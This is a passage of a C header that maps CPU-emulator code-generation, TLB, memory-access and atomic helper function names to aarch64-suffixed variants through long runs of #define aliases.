tcg_gen_bswap64_i64_aarch64 #define tcg_gen_not_i64 tcg_gen_not_i64_aarch64 #define tcg_gen_andc_i64 tcg_gen_andc_i64_aarch64 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_aarch64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_aarch64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_aarch64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_aarch64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_aarch64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_aarch64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_aarch64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_aarch64 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_aarch64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_aarch64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_aarch64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_aarch64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_aarch64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_aarch64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_aarch64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_aarch64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_aarch64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_aarch64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_aarch64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_aarch64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_aarch64 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_aarch64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_aarch64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_aarch64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_aarch64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_aarch64 #define tcg_gen_umin_i64 tcg_gen_umin_i64_aarch64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_aarch64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_aarch64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_aarch64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_aarch64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_aarch64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_aarch64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_aarch64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_aarch64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_aarch64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_aarch64 #define tcg_gen_exit_tb tcg_gen_exit_tb_aarch64 #define tcg_gen_goto_tb tcg_gen_goto_tb_aarch64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_aarch64 #define check_exit_request check_exit_request_aarch64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_aarch64 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_aarch64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_aarch64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_aarch64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_aarch64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_aarch64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_aarch64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_aarch64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_aarch64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_aarch64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_aarch64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_aarch64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_aarch64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_aarch64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_aarch64 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_aarch64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_aarch64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_aarch64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_aarch64 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_aarch64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_aarch64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_aarch64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_aarch64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_aarch64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_aarch64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_aarch64 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_aarch64 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_aarch64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_aarch64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_aarch64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_aarch64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_aarch64 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_aarch64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_aarch64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_aarch64 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_aarch64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_aarch64 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_aarch64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_aarch64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_aarch64 #define simd_desc simd_desc_aarch64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_aarch64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_aarch64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_aarch64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_aarch64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_aarch64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_aarch64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_aarch64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_aarch64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_aarch64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_aarch64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_aarch64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_aarch64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_aarch64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_aarch64 #define tcg_gen_gvec_4 tcg_gen_gvec_4_aarch64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_aarch64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_aarch64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_aarch64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_aarch64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_aarch64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_aarch64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_aarch64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_aarch64 #define tcg_gen_gvec_not tcg_gen_gvec_not_aarch64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_aarch64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_aarch64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_aarch64 #define tcg_gen_gvec_add tcg_gen_gvec_add_aarch64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_aarch64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_aarch64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_aarch64 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_aarch64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_aarch64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_aarch64 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_aarch64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_aarch64 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_aarch64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_aarch64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_aarch64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_aarch64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_aarch64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_aarch64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_aarch64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_aarch64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_aarch64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_aarch64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_aarch64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_aarch64 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_aarch64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_aarch64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_aarch64 #define tcg_gen_gvec_and tcg_gen_gvec_and_aarch64 #define tcg_gen_gvec_or tcg_gen_gvec_or_aarch64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_aarch64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_aarch64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_aarch64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_aarch64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_aarch64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_aarch64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_aarch64 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_aarch64 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_aarch64 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_aarch64 #define tcg_gen_gvec_ors tcg_gen_gvec_ors_aarch64 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_aarch64 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_aarch64 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_aarch64 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_aarch64 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_aarch64 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_aarch64 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_aarch64 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_aarch64 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_aarch64 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_aarch64 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_aarch64 #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_aarch64 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_aarch64 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_aarch64 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_aarch64 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_aarch64 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_aarch64 #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_aarch64 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_aarch64 #define vec_gen_2 vec_gen_2_aarch64 #define vec_gen_3 vec_gen_3_aarch64 #define vec_gen_4 vec_gen_4_aarch64 #define tcg_gen_mov_vec tcg_gen_mov_vec_aarch64 #define tcg_const_zeros_vec tcg_const_zeros_vec_aarch64 #define tcg_const_ones_vec tcg_const_ones_vec_aarch64 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_aarch64 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_aarch64 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_aarch64 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_aarch64 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_aarch64 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_aarch64 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_aarch64 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_aarch64 #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_aarch64 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_aarch64 #define tcg_gen_ld_vec tcg_gen_ld_vec_aarch64 #define tcg_gen_st_vec tcg_gen_st_vec_aarch64 #define tcg_gen_stl_vec tcg_gen_stl_vec_aarch64 #define tcg_gen_and_vec tcg_gen_and_vec_aarch64 #define tcg_gen_or_vec tcg_gen_or_vec_aarch64 #define tcg_gen_xor_vec tcg_gen_xor_vec_aarch64 #define tcg_gen_andc_vec tcg_gen_andc_vec_aarch64 #define tcg_gen_orc_vec tcg_gen_orc_vec_aarch64 #define tcg_gen_nand_vec tcg_gen_nand_vec_aarch64 #define tcg_gen_nor_vec tcg_gen_nor_vec_aarch64 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_aarch64 #define tcg_gen_not_vec tcg_gen_not_vec_aarch64 #define tcg_gen_neg_vec tcg_gen_neg_vec_aarch64 #define tcg_gen_abs_vec tcg_gen_abs_vec_aarch64 #define tcg_gen_shli_vec tcg_gen_shli_vec_aarch64 #define tcg_gen_shri_vec tcg_gen_shri_vec_aarch64 #define tcg_gen_sari_vec tcg_gen_sari_vec_aarch64 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_aarch64 #define tcg_gen_add_vec tcg_gen_add_vec_aarch64 #define tcg_gen_sub_vec tcg_gen_sub_vec_aarch64 #define tcg_gen_mul_vec tcg_gen_mul_vec_aarch64 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_aarch64 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_aarch64 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_aarch64 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_aarch64 #define tcg_gen_smin_vec tcg_gen_smin_vec_aarch64 #define tcg_gen_umin_vec tcg_gen_umin_vec_aarch64 #define tcg_gen_smax_vec tcg_gen_smax_vec_aarch64 #define tcg_gen_umax_vec tcg_gen_umax_vec_aarch64 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_aarch64 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_aarch64 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_aarch64 #define tcg_gen_shls_vec tcg_gen_shls_vec_aarch64 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_aarch64 #define tcg_gen_sars_vec tcg_gen_sars_vec_aarch64 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_aarch64 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_aarch64 #define tb_htable_lookup tb_htable_lookup_aarch64 #define tb_set_jmp_target tb_set_jmp_target_aarch64 #define cpu_exec cpu_exec_aarch64 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_aarch64 #define cpu_reloading_memory_map cpu_reloading_memory_map_aarch64 #define cpu_loop_exit cpu_loop_exit_aarch64 #define cpu_loop_exit_restore cpu_loop_exit_restore_aarch64 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_aarch64 #define tlb_init tlb_init_aarch64 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_aarch64 #define tlb_flush tlb_flush_aarch64 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_aarch64 #define tlb_flush_all_cpus tlb_flush_all_cpus_aarch64 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_aarch64 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_aarch64 #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_aarch64 #define tlb_flush_page tlb_flush_page_aarch64 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_aarch64 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_aarch64 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_aarch64 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_aarch64 #define tlb_protect_code tlb_protect_code_aarch64 #define tlb_unprotect_code tlb_unprotect_code_aarch64 #define tlb_reset_dirty tlb_reset_dirty_aarch64 #define tlb_set_dirty tlb_set_dirty_aarch64 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_aarch64 #define tlb_set_page tlb_set_page_aarch64 #define get_page_addr_code_hostp get_page_addr_code_hostp_aarch64 #define get_page_addr_code get_page_addr_code_aarch64 #define probe_access probe_access_aarch64 #define tlb_vaddr_to_host tlb_vaddr_to_host_aarch64 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_aarch64 #define helper_le_lduw_mmu helper_le_lduw_mmu_aarch64 #define helper_be_lduw_mmu helper_be_lduw_mmu_aarch64 #define helper_le_ldul_mmu helper_le_ldul_mmu_aarch64 #define helper_be_ldul_mmu helper_be_ldul_mmu_aarch64 #define helper_le_ldq_mmu helper_le_ldq_mmu_aarch64 #define helper_be_ldq_mmu helper_be_ldq_mmu_aarch64 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_aarch64 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_aarch64 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_aarch64 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_aarch64 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_aarch64 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_aarch64 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_aarch64 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_aarch64 #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_aarch64 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_aarch64 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_aarch64 #define cpu_ldub_data_ra cpu_ldub_data_ra_aarch64 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_aarch64 #define cpu_lduw_data_ra cpu_lduw_data_ra_aarch64 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_aarch64 #define cpu_ldl_data_ra cpu_ldl_data_ra_aarch64 #define cpu_ldq_data_ra cpu_ldq_data_ra_aarch64 #define cpu_ldub_data cpu_ldub_data_aarch64 #define cpu_ldsb_data cpu_ldsb_data_aarch64 #define cpu_lduw_data cpu_lduw_data_aarch64 #define cpu_ldsw_data cpu_ldsw_data_aarch64 #define cpu_ldl_data cpu_ldl_data_aarch64 #define cpu_ldq_data cpu_ldq_data_aarch64 #define helper_ret_stb_mmu helper_ret_stb_mmu_aarch64 #define helper_le_stw_mmu helper_le_stw_mmu_aarch64 #define helper_be_stw_mmu helper_be_stw_mmu_aarch64 #define helper_le_stl_mmu helper_le_stl_mmu_aarch64 #define helper_be_stl_mmu helper_be_stl_mmu_aarch64 #define helper_le_stq_mmu helper_le_stq_mmu_aarch64 #define helper_be_stq_mmu helper_be_stq_mmu_aarch64 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_aarch64 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_aarch64 #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_aarch64 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_aarch64 #define cpu_stb_data_ra cpu_stb_data_ra_aarch64 #define cpu_stw_data_ra cpu_stw_data_ra_aarch64 #define cpu_stl_data_ra cpu_stl_data_ra_aarch64 #define cpu_stq_data_ra cpu_stq_data_ra_aarch64 #define cpu_stb_data cpu_stb_data_aarch64 #define cpu_stw_data cpu_stw_data_aarch64 #define cpu_stl_data cpu_stl_data_aarch64 #define cpu_stq_data cpu_stq_data_aarch64 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_aarch64 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_aarch64 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_aarch64 #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_aarch64 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_aarch64 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_aarch64 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_aarch64 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_aarch64 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_aarch64 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_aarch64 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_aarch64 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_aarch64 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_aarch64 #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_aarch64 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_aarch64 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_aarch64 #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_aarch64 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_aarch64 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_aarch64 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_aarch64 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_aarch64 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_aarch64 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_aarch64 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_aarch64 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_aarch64 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_aarch64 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_aarch64 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_aarch64 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_aarch64 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_aarch64 #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_aarch64 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_aarch64 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_aarch64 #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_aarch64 #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_aarch64 #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_aarch64 #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_aarch64 #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_aarch64 #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_aarch64 #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_aarch64 #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_aarch64 #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_aarch64 #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_aarch64 #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_aarch64 #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_aarch64 #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_aarch64 #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_aarch64 #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_aarch64 #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_aarch64 #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_aarch64 #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_aarch64 #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_aarch64 #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_aarch64 #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_aarch64 #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_aarch64 #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_aarch64 #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_aarch64 #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_aarch64 #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_aarch64 #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_aarch64 #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_aarch64 #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_aarch64 #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_aarch64 #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_aarch64 #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_aarch64 #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_aarch64 #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_aarch64 #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_aarch64 #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_aarch64 #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_aarch64 #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_aarch64 #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_aarch64 #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_aarch64 #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_aarch64 #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_aarch64 #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_aarch64 #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_aarch64 #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_aarch64 #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_aarch64 #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_aarch64 #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_aarch64 #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_aarch64 #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_aarch64 #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_aarch64 #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_aarch64 #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_aarch64 #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_aarch64 #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_aarch64 #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_aarch64 #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_aarch64 #define helper_atomic_cmpxchgq_le_mmu 